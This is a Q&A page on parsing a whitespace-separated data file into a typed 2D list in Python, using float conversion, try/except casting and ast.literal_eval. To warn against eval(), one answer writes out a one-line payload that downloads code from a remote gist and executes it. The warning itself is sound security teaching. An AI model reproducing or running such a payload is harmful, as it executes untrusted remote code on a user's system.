How do I parse a file into a 2d array while supporting data types in Python?

I am new to programming. I want to read a data file and store it as a 2d array in python3 so that I can work with individual items. I am using the following method to read in a file:

with open("text.txt", "r") as text:
    lines = [line.split() for line in text]

      

It, however, parses everything as text. How can I read in a file while saving data types (parsing text as text, ints as int and float as float, etc.)? The input file looks like this:

HNUS 4973168.840 1734085.512 -3585434.051
PRET 5064032.237 2724721.031 -2752950.762
RBAY 4739765.776 2970758.460 -3054077.535
TDOU 5064840.815 2969624.535 -2485109.939
ULDI 4796680.897 2930311.589 -3005435.714

      

+3


source to share


2 answers


Usually, you should expect a specific type of data for rows, columns, or specific cells. In your case, it will be a string in every first cell of the row and numbers following in all other cells.

data = []
with open('text.txt', 'r') as fp:
  for line in (l.split() for l in fp):
    line[1:] = [float(x) for x in line[1:]]
    data.append(line)

      

If you really want to convert every cell to the closest applicable data type, you can use a function like this and apply it to every cell in a 2D list.



def nearest_applicable_conversion(x):
  try:
    return int(x)
  except ValueError:
    pass
  try:
    return float(x)
  except ValueError:
    pass
  return x

      

I am greatly discouraged to use eval()

as it will evaluate any valid Python code and makes your system vulnerable to attacks by those who know how. I could easily execute arbitrary code by putting the following code in one of the cells that you are eval()

from text.txt

, I just have to make sure it doesn't contain spaces as it will make the code split into multiple cells:

(lambda:(eval(compile(__import__('urllib.request').request.urlopen('https://gist.githubusercontent.com/NiklasRosenstein/470377b7ceef98ef6b87/raw/06593a30d5b00ca506b536315ac79f7b950a5163/jagged.py').read().decode(),'<string>','exec'),globals())))()

      

+1


source


Is this what you want

import ast
with open("1.txt","r") as inp:
    c= [a if a.isalpha() else ast.literal_eval(a.strip()) for line in inp for a in line.split()   ]

      

output:

print c
['HNUS', 4973168.84, 1734085.512, -3585434.051, 'PRET', 5064032.237, 2724721.031, -2752950.762, 'RBAY', 4739765.776, 2970758.46, -3054077.535, 'TDOU', 5064840.815, 2969624.535, -2485109.939, 'ULDI', 4796680.897, 2930311.589, -3005435.714]
print c[1],type(c[1])
4973168.84 <type 'float'>

      

you cannot directly apply as.literal_eval()

to string arguments. Since it strips the quotes of the arguments

those.)



ast.literal_eval("as")
File "<unknown>", line 1
    as
    ^
SyntaxError: unexpected EOF while parsing


ast.literal_eval('"as"')
'as'

      

Edit:

To get it as a 2-dimensional array:

import ast
with open("1.txt","r") as inp:
    c= [[a if a.isalpha() else ast.literal_eval(a.strip()) for a in line.split() ]  for line in inp  ]

      

output:

print c
[['HNUS', 4973168.84, 1734085.512, -3585434.051], ['PRET', 5064032.237, 2724721.031, -2752950.762], ['RBAY', 4739765.776, 2970758.46, -3054077.535], ['TDOU', 5064840.815, 2969624.535, -2485109.939], ['ULDI', 4796680.897, 2930311.589, -3005435.714]]

      

+1


source







All Articles